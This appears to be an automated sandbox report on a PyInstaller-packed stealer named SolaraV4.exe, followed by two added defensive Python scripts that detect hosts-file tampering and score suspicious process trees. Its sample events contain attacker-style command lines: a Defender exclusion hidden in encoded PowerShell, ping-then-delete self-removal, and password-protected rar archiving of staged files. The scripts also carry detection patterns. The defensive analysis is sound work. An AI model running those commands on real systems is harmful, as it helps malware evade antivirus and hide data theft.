SolaraV4.exe, 00000001.00000003.2469062237.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: SolaraV4.exe, 00000003.00000002.2977470781.0000024133870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: SolaraV4.exe, 00000003.00000003.2966380888.0000024133ECB000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2977470781.0000024133870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: SolaraV4.exe, 00000003.00000003.2820032119.0000024133501000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: SolaraV4.exe, 00000003.00000002.2977470781.0000024133870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: SolaraV4.exe, 00000003.00000003.2820032119.0000024133501000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SolaraV4.exe, 00000003.00000002.2977638969.00000241338C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: SolaraV4.exe, 00000003.00000003.2640204583.0000024133495000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2661241266.0000024133495000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2659321131.0000024133495000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2974839187.0000024133170000.00000004.00001000.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2657682251.0000024133549000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2977638969.0000024133920000.00000004.00001000.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2652473109.0000024133495000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: SolaraV4.exe, 00000003.00000002.2977638969.00000241338F4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/
Source: SolaraV4.exe, 00000003.00000003.2609667863.000002413355D000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2595469515.000002413355D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: SolaraV4.exe, 00000003.00000003.2634564917.0000024133558000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2657682251.0000024133558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.5iSPD7jwkDnW
Source: SolaraV4.exe, 00000003.00000003.2642570776.0000024132C16000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2609667863.000002413355D000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2595469515.000002413355D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: SolaraV4.exe, 00000003.00000003.2634564917.0000024133558000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2657682251.0000024133558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.3UfcDFx2ZSAZ
Source: SolaraV4.exe, 00000003.00000003.2634564917.0000024133558000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2612878414.000002413354D000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2657682251.0000024133558000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2609667863.000002413355D000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2595469515.000002413354D000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2975029437.0000024133363000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2595469515.000002413355D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: SolaraV4.exe, 00000003.00000003.2634564917.0000024133558000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2657682251.0000024133558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: SolaraV4.exe, 00000003.00000002.2977638969.00000241338F4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: SolaraV4.exe, 00000003.00000003.2966380888.0000024133ECB000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2977470781.0000024133870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2986752957.00007FFE761B3000.00000004.00000001.01000000.0000000F.sdmp, SolaraV4.exe, 00000003.00000002.2983884533.00007FFE75E51000.00000004.00000001.01000000.00000010.sdmp String found in binary or memory: https://www.openssl.org/H
Source: SolaraV4.exe, 00000001.00000003.2467594867.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: SolaraV4.exe, 00000003.00000002.2974034125.0000024132C70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: SolaraV4.exe, 00000003.00000003.2966380888.0000024133ECB000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2977470781.0000024133870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: SolaraV4.exe, 00000003.00000003.2496514190.0000024132E88000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2668174875.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2974439569.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2658597789.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2967612000.0000024132E7E000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2679350163.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2677235249.0000024132E7F000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2660879553.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2637075073.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2821702107.0000024132E80000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2614558332.0000024132E7F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: SolaraV4.exe, 00000003.00000003.2966380888.0000024133ECB000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2977470781.0000024133870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: SolaraV4.exe, 00000003.00000002.2977470781.0000024133870000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: SolaraV4.exe, 00000003.00000003.2668174875.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2679350163.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2658597789.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2975029437.0000024133330000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2614558332.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2967612000.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2821702107.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2637075073.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2660879553.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2677235249.0000024133041000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000002.2974439569.0000024133041000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://yahoo.com/
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\SolaraV4.exe File deleted: C:\Users\user\AppData\Local\Temp\?? ?? ?? \Common Files\Desktop\EFOYFBOLXA.docx
Source: C:\Users\user\Desktop\SolaraV4.exe File deleted: C:\Users\user\AppData\Local\Temp\?? ?? ?? \Common Files\Desktop\BJZFPPWAPT.pdf
Source: C:\Users\user\Desktop\SolaraV4.exe File deleted: C:\Users\user\AppData\Local\Temp\?? ?? ?? \Common Files\Desktop\EOWRVPQCCS.mp3
Source: C:\Users\user\Desktop\SolaraV4.exe File deleted: C:\Users\user\AppData\Local\Temp\?? ?? ?? \Common Files\Desktop\EOWRVPQCCS.mp3
Source: C:\Users\user\Desktop\SolaraV4.exe File deleted: C:\Users\user\AppData\Local\Temp\?? ?? ?? \Common Files\Desktop\PALRGUCVEH.xlsx
Source: C:\Users\user\Desktop\SolaraV4.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: conhost.exe Process created: 40
Source: cmd.exe Process created: 75
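The write to C:\Windows\System32\drivers\etc\hosts recorded above deserves a look on any host where this sample ran: a stealer that touches the hosts file normally does so to pin security-vendor, update or telemetry hostnames to a sinkhole address so that signatures stop updating and cloud lookups fail. The script below is an added example, not part of this report and not code from the sample. It parses a hosts file, keeps only active (non-comment) mappings, and flags those that point a watched domain at a sinkhole address or redirect it elsewhere. The hosts content and the watch list are constructed for illustration; neither was taken from the sample, and the watch list should be replaced with your own vendor and update domains.

```python
r"""Flag suspicious entries in a Windows hosts file.

Added example (not from the sandbox report or the sample): a stealer that
writes C:\Windows\System32\drivers\etc\hosts typically pins security-vendor
or update hostnames to a loopback/null address. This parser lists every
active mapping and flags the ones that touch a watched domain, whether they
sinkhole it (0.0.0.0 / 127.0.0.1) or redirect it to some other address.
The hosts text and the watch list are constructed, not sample IOCs.
"""
import ipaddress
import re
from dataclasses import dataclass

# Constructed watch list; extend it from your own threat intel.
WATCHED_SUFFIXES = (
    "microsoft.com", "windowsupdate.com", "virustotal.com",
    "malwarebytes.com", "kaspersky.com", "eset.com", "sophos.com",
    "mcafee.com", "avast.com", "bitdefender.com",
)

# Addresses used to "sinkhole" a name locally.
SINKHOLE_ADDRS = {"0.0.0.0", "127.0.0.1", "::1", "::"}


@dataclass(frozen=True)
class HostsEntry:
    line_no: int
    address: str
    names: tuple
    sinkholed: bool
    watched: tuple  # names on this line that matched the watch list


def _is_watched(host: str) -> bool:
    h = host.lower().rstrip(".")
    return any(h == s or h.endswith("." + s) for s in WATCHED_SUFFIXES)


def parse_hosts(text: str):
    """Yield a HostsEntry for each active (non-comment) mapping."""
    for n, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        parts = re.split(r"\s+", line)
        addr, names = parts[0], tuple(parts[1:])
        try:
            ipaddress.ip_address(addr)
        except ValueError:
            continue  # malformed line; the resolver ignores it too
        yield HostsEntry(
            line_no=n,
            address=addr,
            names=names,
            sinkholed=addr in SINKHOLE_ADDRS,
            watched=tuple(h for h in names if _is_watched(h)),
        )


def suspicious_entries(text: str):
    """Entries that sinkhole or redirect a watched name; the default Windows
    hosts file carries comments only, so any watched mapping is attacker-added."""
    return [e for e in parse_hosts(text) if e.watched]


# Constructed hosts file: Microsoft's stock comments plus four added lines.
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#\t127.0.0.1       localhost
#\t::1             localhost
127.0.0.1 localhost
0.0.0.0 www.virustotal.com
0.0.0.0 download.windowsupdate.com  # constructed
127.0.0.1 totallyfine.example
198.51.100.7 update.eset.com
"""

if __name__ == "__main__":
    for e in suspicious_entries(SAMPLE_HOSTS):
        kind = "sinkholed" if e.sinkholed else "redirected"
        print(f"line {e.line_no}: {kind} {', '.join(e.watched)} -> {e.address}")
```

On a live system, read the file with elevated rights and also compare its modification time against the installation date; a hosts file younger than the OS install with active mappings is itself a finding even when no watched domain appears.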

System Summary

Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71FE21C: FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle, 108_2_00007FF7C71FE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C722B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx, 108_2_00007FF7C722B57C
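The WMI registry reads above are issued by tree.com and getmac.exe, built-in tools the sample drives through cmd.exe (this report counts 75 processes created by cmd.exe and 40 by conhost.exe), next to rar.exe launched from the PyInstaller extraction directory _MEI71122 and the encoded PowerShell flagged in the signature list. None of those children is suspicious on its own; the tree is. The script below is an added example, not part of this report and not the malware's code: it scores constructed Sysmon-style process-creation events by the relationships this report documents. Field names, weights, the fan-out threshold and every command line are assumptions; the base64 in the PowerShell record is generated inline and then decoded back, which is also how you recover an MpPreference change hidden behind -EncodedCommand.

```python
r"""Score process-creation telemetry for the child-process pattern in this report.

Added example; it is not part of the sandbox report or of the malware. The
records below are constructed Sysmon-style events (ProcessId, ParentProcessId,
Image, CommandLine) shaped like what the report shows: a root binary under the
user profile, cmd.exe fan-out, rar.exe run from a PyInstaller _MEIxxxxx
directory, tree.com and getmac.exe, an encoded PowerShell command line. Field
names, weights and the fan-out threshold are assumptions to tune on real data.
"""
import base64
import binascii
import re
from collections import defaultdict

LOLBINS = {"tree.com", "getmac.exe", "ping.exe", "attrib.exe", "tasklist.exe", "netsh.exe"}
PYINSTALLER_TMP = re.compile(r"\\_MEI\d+\\", re.IGNORECASE)
ENCODED_PS = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
PING_DEL = re.compile(r"(?i)\bping\b.*&\s*del\b")
RAR_PASSWORD = re.compile(r"(?i)\s-hp\S+")   # -hp<pw>: encrypts file names as well as data
FANOUT_THRESHOLD = 20                          # children per parent before we flag it


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Plaintext of a powershell -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    m = ENCODED_PS.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return ""


def root_of(pid: int, by_pid: dict) -> int:
    """Follow ParentProcessId upward until the parent is outside our events."""
    seen = set()
    while pid not in seen and by_pid[pid]["ParentProcessId"] in by_pid:
        seen.add(pid)
        pid = by_pid[pid]["ParentProcessId"]
    return pid


def score_trees(events: list) -> dict:
    """Map each tree's root ProcessId to (score, reasons)."""
    by_pid = {e["ProcessId"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ParentProcessId"]].append(e)
    trees = defaultdict(lambda: [0, []])

    def note(root, weight, why):
        trees[root][0] += weight
        trees[root][1].append(why)

    for e in events:
        root = root_of(e["ProcessId"], by_pid)
        root_img = by_pid[root]["Image"]
        img, cmd = basename(e["Image"]), e.get("CommandLine", "")
        # The same admin tools under explorer.exe are routine; under a binary
        # that lives outside the Windows directory they are worth a point each.
        untrusted_root = not root_img.lower().startswith("c:\\windows\\")
        if PYINSTALLER_TMP.search(e["Image"]):
            note(root, 4, f"{img} executed from a PyInstaller _MEI temp directory")
        if img == "rar.exe" and RAR_PASSWORD.search(cmd):
            note(root, 4, "rar.exe archiving with -hp (password-protected, encrypted headers)")
        if img in LOLBINS and untrusted_root:
            note(root, 1, f"{img} spawned beneath {basename(root_img)}")
        if img == "cmd.exe" and PING_DEL.search(cmd):
            note(root, 3, "ping-then-del self-deletion")
        if img == "powershell.exe":
            plain = decode_encoded_command(cmd)
            if plain:
                note(root, 3, "encoded PowerShell command line")
                if re.search(r"(?i)\b(Add|Set)-MpPreference\b", plain):
                    note(root, 3, "Defender preference change hidden in the encoded command")
    for parent, kids in children.items():
        if parent in by_pid and len(kids) >= FANOUT_THRESHOLD:
            note(root_of(parent, by_pid), 2,
                 f"{basename(by_pid[parent]['Image'])} spawned {len(kids)} children")
    return {r: (s, why) for r, (s, why) in trees.items()}


def _encode_ps(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed events, not sandbox output; PIDs are arbitrary.
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 1, "Image": r"C:\Users\user\Desktop\SolaraV4.exe", "CommandLine": ""},
    {"ProcessId": 101, "ParentProcessId": 100, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd /c "ping 127.0.0.1 -n 3 & del /f /q SolaraV4.exe"'},
    {"ProcessId": 102, "ParentProcessId": 101, "Image": r"C:\Windows\System32\tree.com", "CommandLine": "tree /A /F"},
    {"ProcessId": 103, "ParentProcessId": 101, "Image": r"C:\Windows\System32\getmac.exe", "CommandLine": "getmac"},
    {"ProcessId": 104, "ParentProcessId": 101, "Image": r"C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe",
     "CommandLine": "rar.exe a -r -hpSecret -m5 out.rar staging\\"},
    {"ProcessId": 105, "ParentProcessId": 101, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -enc " + _encode_ps('Add-MpPreference -ExclusionPath "C:\\Users\\user"')},
    # Benign control: explorer.exe running getmac.exe through cmd.exe scores nothing.
    {"ProcessId": 200, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe", "CommandLine": ""},
    {"ProcessId": 201, "ParentProcessId": 200, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd"},
    {"ProcessId": 202, "ParentProcessId": 201, "Image": r"C:\Windows\System32\getmac.exe", "CommandLine": "getmac"},
]
# Fan-out: the sample's cmd.exe launching many short-lived conhost.exe children.
SAMPLE_EVENTS += [
    {"ProcessId": 300 + i, "ParentProcessId": 101, "Image": r"C:\Windows\System32\conhost.exe", "CommandLine": ""}
    for i in range(FANOUT_THRESHOLD)
]

if __name__ == "__main__":
    for root, (score, why) in sorted(score_trees(SAMPLE_EVENTS).items()):
        print(f"root pid {root}: score {score}")
        for w in why:
            print("  -", w)
```

The deleted documents listed in the previous section sit under a Temp subdirectory that mirrors the user's Desktop; on the assumption that this is the staging folder rar.exe archives before the copies are removed, the "rar.exe -hp" and "_MEI" findings above are the ones to pivot on, and the ransomware label in the signature list is not.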
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\SIHClient.exe File created: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMPF080.tmp
Source: C:\Windows\System32\SIHClient.exe File created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMPF88B.tmp
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC708C8 1_2_00007FF6FFC708C8
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC51000 1_2_00007FF6FFC51000
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC589E0 1_2_00007FF6FFC589E0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC76964 1_2_00007FF6FFC76964
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC680E4 1_2_00007FF6FFC680E4
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC740AC 1_2_00007FF6FFC740AC
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC71874 1_2_00007FF6FFC71874
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC59800 1_2_00007FF6FFC59800
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC68794 1_2_00007FF6FFC68794
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC61740 1_2_00007FF6FFC61740
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC61F60 1_2_00007FF6FFC61F60
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC79728 1_2_00007FF6FFC79728
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC6DEF0 1_2_00007FF6FFC6DEF0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC75E7C 1_2_00007FF6FFC75E7C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC69EA0 1_2_00007FF6FFC69EA0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC635A0 1_2_00007FF6FFC635A0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC61D54 1_2_00007FF6FFC61D54
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC6E570 1_2_00007FF6FFC6E570
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC65D30 1_2_00007FF6FFC65D30
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC5A47B 1_2_00007FF6FFC5A47B
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC5ACAD 1_2_00007FF6FFC5ACAD
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC73C10 1_2_00007FF6FFC73C10
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC62C10 1_2_00007FF6FFC62C10
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC75C00 1_2_00007FF6FFC75C00
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC76418 1_2_00007FF6FFC76418
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC708C8 1_2_00007FF6FFC708C8
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC61B50 1_2_00007FF6FFC61B50
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC5A2DB 1_2_00007FF6FFC5A2DB
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC6DA5C 1_2_00007FF6FFC6DA5C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC639A4 1_2_00007FF6FFC639A4
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC61944 1_2_00007FF6FFC61944
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC62164 1_2_00007FF6FFC62164
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC51000 3_2_00007FF6FFC51000
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC5A2DB 3_2_00007FF6FFC5A2DB
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC76964 3_2_00007FF6FFC76964
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC708C8 3_2_00007FF6FFC708C8
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC680E4 3_2_00007FF6FFC680E4
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC740AC 3_2_00007FF6FFC740AC
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC71874 3_2_00007FF6FFC71874
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC59800 3_2_00007FF6FFC59800
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC68794 3_2_00007FF6FFC68794
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC61740 3_2_00007FF6FFC61740
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC61F60 3_2_00007FF6FFC61F60
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC79728 3_2_00007FF6FFC79728
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC6DEF0 3_2_00007FF6FFC6DEF0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC75E7C 3_2_00007FF6FFC75E7C
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC69EA0 3_2_00007FF6FFC69EA0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC635A0 3_2_00007FF6FFC635A0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC61D54 3_2_00007FF6FFC61D54
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC6E570 3_2_00007FF6FFC6E570
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC65D30 3_2_00007FF6FFC65D30
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC5A47B 3_2_00007FF6FFC5A47B
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC5ACAD 3_2_00007FF6FFC5ACAD
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC73C10 3_2_00007FF6FFC73C10
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC62C10 3_2_00007FF6FFC62C10
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC75C00 3_2_00007FF6FFC75C00
